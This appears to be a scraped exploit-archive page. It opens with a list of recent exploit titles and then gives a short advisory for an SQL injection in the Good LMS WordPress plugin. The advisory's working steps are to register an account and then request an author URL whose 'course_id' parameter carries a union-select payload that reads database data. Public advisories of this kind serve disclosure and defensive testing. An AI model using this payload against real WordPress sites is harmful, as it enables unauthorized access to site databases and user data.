bd1b51b595
9 changes to exploits/shellcodes RAVPower 2.000.056 - Memory Disclosure Acunetix WVS 10 - Local Privilege Escalation NoMachine 5.3.9 - Local Privilege Escalation Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) Acunetix WVS 10 - Remote Command Execution Exodus Wallet (ElectronJS Framework) - Remote Code Execution BMC BladeLogic 8.3.00.64 - Remote Command Execution Vodafone Mobile Wifi - Reset Admin Password Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload Dodocool DC38 N300 - Cross-site Request Forgery WordPress Plugin Learning Management System - 'course_id' SQL Injection Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
17 lines
No EOL
679 B
Text
17 lines
No EOL
679 B
Text
# Exploit Title: Good LMS - Learning Management System WP Plugin SQL
|
|
Injection
|
|
# Date: 2018-01-24
|
|
# Exploit Author: Esecurity.ir
|
|
# Exploit Author Web Site: http://esecurity.ir
|
|
# Special Thanks : Meisam Monsef [meisamrce@gmail.com] - Telegram ID :
|
|
@meisamrce
|
|
# Vendor Homepage: https://goodlayers.com/
|
|
# Version: All Version
|
|
|
|
Exploit :
|
|
|
|
1 - First enter the link below and create an account
|
|
http://target.com/?register=1
|
|
2 - the exploit
|
|
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
|
|
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23 |